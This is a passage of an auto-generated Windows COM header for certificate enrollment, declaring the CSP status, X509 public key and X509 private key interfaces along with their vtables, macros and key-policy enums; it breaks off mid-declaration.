#define ICspStatus_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICspStatus_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICspStatus_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICspStatus_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICspStatus_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICspStatus_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICspStatus_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICspStatus_Initialize(This,pCsp,pAlgorithm)	\
    ( (This)->lpVtbl -> Initialize(This,pCsp,pAlgorithm) ) 

#define ICspStatus_get_Ordinal(This,pValue)	\
    ( (This)->lpVtbl -> get_Ordinal(This,pValue) ) 

#define ICspStatus_put_Ordinal(This,Value)	\
    ( (This)->lpVtbl -> put_Ordinal(This,Value) ) 

#define ICspStatus_get_CspAlgorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspAlgorithm(This,ppValue) ) 

#define ICspStatus_get_CspInformation(This,ppValue)	\
    ( (This)->lpVtbl -> get_CspInformation(This,ppValue) ) 

#define ICspStatus_get_EnrollmentStatus(This,ppValue)	\
    ( (This)->lpVtbl -> get_EnrollmentStatus(This,ppValue) ) 

#define ICspStatus_get_DisplayName(This,pValue)	\
    ( (This)->lpVtbl -> get_DisplayName(This,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICspStatus_INTERFACE_DEFINED__ */


#ifndef __ICspStatuses_INTERFACE_DEFINED__
#define __ICspStatuses_INTERFACE_DEFINED__

/* interface ICspStatuses */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_ICspStatuses;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab30a-217d-11da-b2a4-000e7bbb2b09")
    ICspStatuses : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **pVal) = 0;
        
        virtual /* [helpstring][id][propget][custom] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id][custom] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt ICspStatus *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual /* [helpstring][custom][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByName( 
            /* [in] */ __RPC__in BSTR strCspName,
            /* [in] */ __RPC__in BSTR strAlgorithmName,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue) = 0;
        
        virtual /* [helpstring][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByOrdinal( 
            /* [in] */ LONG Ordinal,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue) = 0;
        
        virtual /* [helpstring][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByOperations( 
            /* [in] */ __RPC__in BSTR strCspName,
            /* [in] */ __RPC__in BSTR strAlgorithmName,
            /* [in] */ AlgorithmOperationFlags Operations,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue) = 0;
        
        virtual /* [helpstring][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByProvider( 
            /* [in] */ __RPC__in_opt ICspStatus *pCspStatus,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct ICspStatusesVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in ICspStatuses * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in ICspStatuses * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in ICspStatuses * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in ICspStatuses * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in ICspStatuses * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in ICspStatuses * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            ICspStatuses * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in ICspStatuses * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **pVal);
        
        /* [helpstring][id][propget][custom] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in ICspStatuses * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in ICspStatuses * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id][custom] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in ICspStatuses * This,
            /* [in] */ __RPC__in_opt ICspStatus *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in ICspStatuses * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in ICspStatuses * This);
        
        /* [helpstring][custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByName )( 
            __RPC__in ICspStatuses * This,
            /* [in] */ __RPC__in BSTR strCspName,
            /* [in] */ __RPC__in BSTR strAlgorithmName,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue);
        
        /* [helpstring][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByOrdinal )( 
            __RPC__in ICspStatuses * This,
            /* [in] */ LONG Ordinal,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue);
        
        /* [helpstring][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByOperations )( 
            __RPC__in ICspStatuses * This,
            /* [in] */ __RPC__in BSTR strCspName,
            /* [in] */ __RPC__in BSTR strAlgorithmName,
            /* [in] */ AlgorithmOperationFlags Operations,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue);
        
        /* [helpstring][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByProvider )( 
            __RPC__in ICspStatuses * This,
            /* [in] */ __RPC__in_opt ICspStatus *pCspStatus,
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue);
        
        END_INTERFACE
    } ICspStatusesVtbl;

    interface ICspStatuses
    {
        CONST_VTBL struct ICspStatusesVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define ICspStatuses_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define ICspStatuses_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define ICspStatuses_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define ICspStatuses_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define ICspStatuses_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define ICspStatuses_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define ICspStatuses_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define ICspStatuses_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define ICspStatuses_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define ICspStatuses_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define ICspStatuses_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define ICspStatuses_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define ICspStatuses_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define ICspStatuses_get_ItemByName(This,strCspName,strAlgorithmName,ppValue)	\
    ( (This)->lpVtbl -> get_ItemByName(This,strCspName,strAlgorithmName,ppValue) ) 

#define ICspStatuses_get_ItemByOrdinal(This,Ordinal,ppValue)	\
    ( (This)->lpVtbl -> get_ItemByOrdinal(This,Ordinal,ppValue) ) 

#define ICspStatuses_get_ItemByOperations(This,strCspName,strAlgorithmName,Operations,ppValue)	\
    ( (This)->lpVtbl -> get_ItemByOperations(This,strCspName,strAlgorithmName,Operations,ppValue) ) 

#define ICspStatuses_get_ItemByProvider(This,pCspStatus,ppValue)	\
    ( (This)->lpVtbl -> get_ItemByProvider(This,pCspStatus,ppValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __ICspStatuses_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0012 */
/* [local] */ 

typedef 
enum KeyIdentifierHashAlgorithm
    {
        SKIHashDefault	= 0,
        SKIHashSha1	= 1,
        SKIHashCapiSha1	= 2,
        SKIHashSha256	= 3,
        SKIHashHPKP	= 5
    } 	KeyIdentifierHashAlgorithm;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0012_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0012_v0_0_s_ifspec;

#ifndef __IX509PublicKey_INTERFACE_DEFINED__
#define __IX509PublicKey_INTERFACE_DEFINED__

/* interface IX509PublicKey */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509PublicKey;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab30b-217d-11da-b2a4-000e7bbb2b09")
    IX509PublicKey : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ __RPC__in BSTR strEncodedKey,
            /* [in] */ __RPC__in BSTR strEncodedParameters,
            /* [defaultvalue][in] */ EncodingType Encoding = XCN_CRYPT_STRING_BASE64) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE InitializeFromEncodedPublicKeyInfo( 
            /* [in] */ __RPC__in BSTR strEncodedPublicKeyInfo,
            /* [defaultvalue][in] */ EncodingType Encoding = XCN_CRYPT_STRING_BASE64) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Algorithm( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Length( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EncodedKey( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EncodedParameters( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE ComputeKeyIdentifier( 
            /* [in] */ KeyIdentifierHashAlgorithm Algorithm,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509PublicKeyVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509PublicKey * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509PublicKey * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509PublicKey * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509PublicKey * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509PublicKey * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509PublicKey * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509PublicKey * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509PublicKey * This,
            /* [in] */ __RPC__in_opt IObjectId *pObjectId,
            /* [in] */ __RPC__in BSTR strEncodedKey,
            /* [in] */ __RPC__in BSTR strEncodedParameters,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        HRESULT ( STDMETHODCALLTYPE *InitializeFromEncodedPublicKeyInfo )( 
            __RPC__in IX509PublicKey * This,
            /* [in] */ __RPC__in BSTR strEncodedPublicKeyInfo,
            /* [defaultvalue][in] */ EncodingType Encoding);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Algorithm )( 
            __RPC__in IX509PublicKey * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Length )( 
            __RPC__in IX509PublicKey * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncodedKey )( 
            __RPC__in IX509PublicKey * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EncodedParameters )( 
            __RPC__in IX509PublicKey * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        HRESULT ( STDMETHODCALLTYPE *ComputeKeyIdentifier )( 
            __RPC__in IX509PublicKey * This,
            /* [in] */ KeyIdentifierHashAlgorithm Algorithm,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509PublicKeyVtbl;

    interface IX509PublicKey
    {
        CONST_VTBL struct IX509PublicKeyVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509PublicKey_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509PublicKey_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509PublicKey_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509PublicKey_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509PublicKey_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509PublicKey_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509PublicKey_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509PublicKey_Initialize(This,pObjectId,strEncodedKey,strEncodedParameters,Encoding)	\
    ( (This)->lpVtbl -> Initialize(This,pObjectId,strEncodedKey,strEncodedParameters,Encoding) ) 

#define IX509PublicKey_InitializeFromEncodedPublicKeyInfo(This,strEncodedPublicKeyInfo,Encoding)	\
    ( (This)->lpVtbl -> InitializeFromEncodedPublicKeyInfo(This,strEncodedPublicKeyInfo,Encoding) ) 

#define IX509PublicKey_get_Algorithm(This,ppValue)	\
    ( (This)->lpVtbl -> get_Algorithm(This,ppValue) ) 

#define IX509PublicKey_get_Length(This,pValue)	\
    ( (This)->lpVtbl -> get_Length(This,pValue) ) 

#define IX509PublicKey_get_EncodedKey(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_EncodedKey(This,Encoding,pValue) ) 

#define IX509PublicKey_get_EncodedParameters(This,Encoding,pValue)	\
    ( (This)->lpVtbl -> get_EncodedParameters(This,Encoding,pValue) ) 

#define IX509PublicKey_ComputeKeyIdentifier(This,Algorithm,Encoding,pValue)	\
    ( (This)->lpVtbl -> ComputeKeyIdentifier(This,Algorithm,Encoding,pValue) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509PublicKey_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0013 */
/* [local] */ 

typedef 
enum X509PrivateKeyExportFlags
    {
        XCN_NCRYPT_ALLOW_EXPORT_NONE	= 0,
        XCN_NCRYPT_ALLOW_EXPORT_FLAG	= 0x1,
        XCN_NCRYPT_ALLOW_PLAINTEXT_EXPORT_FLAG	= 0x2,
        XCN_NCRYPT_ALLOW_ARCHIVING_FLAG	= 0x4,
        XCN_NCRYPT_ALLOW_PLAINTEXT_ARCHIVING_FLAG	= 0x8
    } 	X509PrivateKeyExportFlags;

typedef 
enum X509PrivateKeyUsageFlags
    {
        XCN_NCRYPT_ALLOW_USAGES_NONE	= 0,
        XCN_NCRYPT_ALLOW_DECRYPT_FLAG	= 0x1,
        XCN_NCRYPT_ALLOW_SIGNING_FLAG	= 0x2,
        XCN_NCRYPT_ALLOW_KEY_AGREEMENT_FLAG	= 0x4,
        XCN_NCRYPT_ALLOW_ALL_USAGES	= 0xffffff
    } 	X509PrivateKeyUsageFlags;

typedef 
enum X509PrivateKeyProtection
    {
        XCN_NCRYPT_UI_NO_PROTECTION_FLAG	= 0,
        XCN_NCRYPT_UI_PROTECT_KEY_FLAG	= 0x1,
        XCN_NCRYPT_UI_FORCE_HIGH_PROTECTION_FLAG	= 0x2,
        XCN_NCRYPT_UI_FINGERPRINT_PROTECTION_FLAG	= 0x4,
        XCN_NCRYPT_UI_APPCONTAINER_ACCESS_MEDIUM_FLAG	= 0x8
    } 	X509PrivateKeyProtection;

typedef 
enum X509PrivateKeyVerify
    {
        VerifyNone	= 0,
        VerifySilent	= 1,
        VerifySmartCardNone	= 2,
        VerifySmartCardSilent	= 3,
        VerifyAllowUI	= 4
    } 	X509PrivateKeyVerify;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0013_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0013_v0_0_s_ifspec;

#ifndef __IX509PrivateKey_INTERFACE_DEFINED__
#define __IX509PrivateKey_INTERFACE_DEFINED__

/* interface IX509PrivateKey */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509PrivateKey;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab30c-217d-11da-b2a4-000e7bbb2b09")
    IX509PrivateKey : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Open( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Create( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Close( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Delete( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Verify( 
            /* [in] */ X509PrivateKeyVerify VerifyType) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Import( 
            /* [in] */ __RPC__in BSTR strExportType,
            /* [in] */ __RPC__in BSTR strEncodedKey,
            /* [defaultvalue][in] */ EncodingType Encoding = XCN_CRYPT_STRING_BASE64) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Export( 
            /* [in] */ __RPC__in BSTR strExportType,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pstrEncodedKey) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE ExportPublicKey( 
            /* [retval][out] */ __RPC__deref_out_opt IX509PublicKey **ppPublicKey) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_ContainerName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_ContainerName( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ContainerNamePrefix( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_ContainerNamePrefix( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ReaderName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_ReaderName( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_CspInformations( 
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_CspInformations( 
            /* [in] */ __RPC__in_opt ICspInformations *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_CspStatus( 
            /* [retval][out] */ __RPC__deref_out_opt ICspStatus **ppValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_CspStatus( 
            /* [in] */ __RPC__in_opt ICspStatus *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_ProviderName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_ProviderName( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_ProviderType( 
            /* [retval][out] */ __RPC__out X509ProviderType *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_ProviderType( 
            /* [in] */ X509ProviderType Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_LegacyCsp( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_LegacyCsp( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_Algorithm( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_Algorithm( 
            /* [in] */ __RPC__in_opt IObjectId *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_KeySpec( 
            /* [retval][out] */ __RPC__out X509KeySpec *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_KeySpec( 
            /* [in] */ X509KeySpec Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_Length( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_Length( 
            /* [in] */ LONG Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_ExportPolicy( 
            /* [retval][out] */ __RPC__out X509PrivateKeyExportFlags *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_ExportPolicy( 
            /* [in] */ X509PrivateKeyExportFlags Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_KeyUsage( 
            /* [retval][out] */ __RPC__out X509PrivateKeyUsageFlags *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_KeyUsage( 
            /* [in] */ X509PrivateKeyUsageFlags Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_KeyProtection( 
            /* [retval][out] */ __RPC__out X509PrivateKeyProtection *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_KeyProtection( 
            /* [in] */ X509PrivateKeyProtection Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_MachineContext( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_MachineContext( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SecurityDescriptor( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_SecurityDescriptor( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Certificate( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Certificate( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_UniqueContainerName( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Opened( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_DefaultContainer( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_Existing( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_Existing( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Silent( 
